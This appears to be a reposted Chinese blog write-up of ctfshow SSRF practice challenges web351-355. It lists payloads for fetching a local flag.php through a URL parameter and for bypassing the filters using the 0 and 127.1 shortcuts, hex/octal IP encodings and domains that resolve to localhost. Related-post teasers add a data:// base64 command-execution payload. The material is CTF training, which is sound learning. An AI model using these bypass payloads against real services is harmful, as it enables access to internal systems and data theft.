ctfshow web入门 ssrf web351-355

8月前作者：mushangqiujin 分类：Toy博客阅读(46) 违法举报

这篇具有很好参考价值的文章主要介绍了ctfshow web入门 ssrf web351-355。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

1.web351

ctfshow web入门 ssrf web351-355
尝试访问本机的flag.php

payload:

url=http://localhost/flag.php
url=http://127.0.0.1/flag.php

2.web352

ctfshow web入门 ssrf web351-355
必须要用http或https，ip没有过滤因为匹配时没加变量，恒为真
payload:

url=http://127.0.0.1/flag.php
url=http://localhost/flag.php

3.web352

ctfshow web入门 ssrf web351-355
必须要用http或https,过滤了127.0.，只要匹配到了127.0.就不能继续执行了
windows 0代表0.0.0.0
linux 0代表 127.0.0.1
可以用0代替127.0.0.1
payload:

url=http://0/flag.php                #特殊0绕过
url=http://0.0.0.0/flag.php     #特殊0绕过
url=url=http://0x7F000001/flag.php   #进制绕过
http://0177.0.0.1/flag.php                   #进制绕过
http://127.1/flag.php                 #简写绕过

4.web354

ctfshow web入门 ssrf web351-355
过滤了0和1，可以把域名解析到127.0.0.1
http://safe.taobao.com/
http://114.taobao.com/
http://wifi.aliyun.com/
http://imis.qq.com/
http://localhost.sec.qq.com/
http://ecd.tencent.com/
http://sudo.cc/

url=http://sudo.cc/flag.php

5.web355

ctfshow web入门 ssrf web351-355
对ip长度做了限制
payload:

url=http://0/flag.php
url=http://127.1/flag.php

参考文章：
ssrf文章来源地址https://www.toymoban.com/news/detail-454791.html

到了这里，关于ctfshow web入门 ssrf web351-355的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

CTFshow web入门 web316-web333 XSS

我tm又来了，总之top10先过一遍，到第三个XSS了，下一个要去看了，看了网上很多wp总感觉不是太全，所以就自己写了一个网站没有对用户提交的数据进行转义处理或者过滤不足，从而被恶意攻击者利用进而被添加一些恶意可执行脚本嵌入到web页面中去，使别的用户访问都会执

2024年02月03日
浏览(35)
ctfshow web入门爆破 21-28

刚进去就要求我们登录，这里题目给了我们一个字典，就是这个字典为什么他那么多数字中就一个字母的密码还不明显吗。这里我们使用burp拦包，这里没有发现登录的账号密码，但是有一串可疑的字符串，尝试base64解密这我们就得到了，我们测试用的账号密码了，这里将

2024年02月01日
浏览(27)
ctfshow web入门 sql注入

sql注入分为多种类型的注入，我将对ctfshow web入门的sql入门进行题目分类，并在最后对每种sql注入做一下总结; 本题类型联合注入第一种方法万能密码第二种方法联合注入这是按照数据库中有3个数据库进行，因为题目一般为3，当然也可以使用查询语句进行查询，语句如

2024年02月21日
浏览(26)
《CTFshow-Web入门》01. Web 1~10

ctf - web入门 web1：网页源码查看。 web2：网页源码查看。 web3：burpsuite 抓包查看响应数据包。 web4：robots.txt 文件泄露后台地址。 web5：phps 文件泄露源码。 web6：网站备份压缩文件泄露源码。 web7：版本控制之 git 泄露源码。 web8：版本控制之 svn 泄露源码。 web9：vim 缓存信息泄露

2024年02月05日
浏览(51)
《CTFshow-Web入门》09. Web 81~90

ctf - web入门 web81：include() 利用，一句话木马之 Nginx 日志利用。 web82~86：include() 利用，条件竞争，利用 session 文件写入一句话木马。 web87：file_put_contents() 利用，伪协议 php://filter/ 。 web88：include() 利用，正则绕过，伪协议 data:// 。 web89：PHP 特性之 intval()。 web90：PHP 特性之

2024年02月10日
浏览(26)
《CTFshow-Web入门》07. Web 61~70

ctf - web入门 web61~70：post 请求之 eval() 利用。这几个题都和 web58 一样。可能内部禁用的函数不一样吧。但 payload 都差不多。不多解释了。以下解法随便挑一个即可。可能不同题会有部分函数被禁。 payload1 ： payload2 ： payload3 ： payload4 ：题目没变化。随便试一个函数。根据

2024年02月01日
浏览(34)
Ctfshow web入门 nodejs篇 web334-web344

前言：做原型链污染，入门的话个人建议先看看P神的文章，只看前四部分就行了。深入理解 JavaScript Prototype 污染攻击 | 离别歌 (leavesongs.com) 然后也得有一点js基础，不用太多，要不然看起来属实费劲。建议看一下《Javascript百炼成仙》，有点小贵，也可以直接看知识点整理

2024年02月16日
浏览(44)
ctfshow-web入门——爆破（web21-web28）

1.bp工具的使用 bp爆破的大概步骤：抓包，Send to Intruder，Positions页面，add$（加入想要爆破的值），Payloads页面，Payload Options，Load，导入想跑的字典，点击Start attack custom iterator（自定义迭代器）模式： payload type选Custom iterrator，position1填admin，position2填: ,position3导入字典，按照

2024年02月04日
浏览(30)
ctfshow web入门 php特性 web108-web112

strrev() 反转字符串 ereg 存在空字符截断(只会匹配%00前面的字符)，这个函数匹配到为true，没有匹配到为false,877为0x36d的十进制数值 payload: 类可以输出，就是当类被当作字符串执行，会调用__trosting魔术方法，这个类要有这个魔术方法,并且要有返回值才可以输出，这个值要可控

2024年02月11日
浏览(31)
ctfshow-web入门37-52

include($c); 表达式包含并运行指定文件。使用data伪协议 ?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg== PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg== 是?php system(\\\'cat flag.php\\\');? base64加密源代码查看得到flag 多禁用了php和file。不会改变伪协议，继续使用上一题命令 ?c=data://text/plain

2024年02月06日
浏览(31)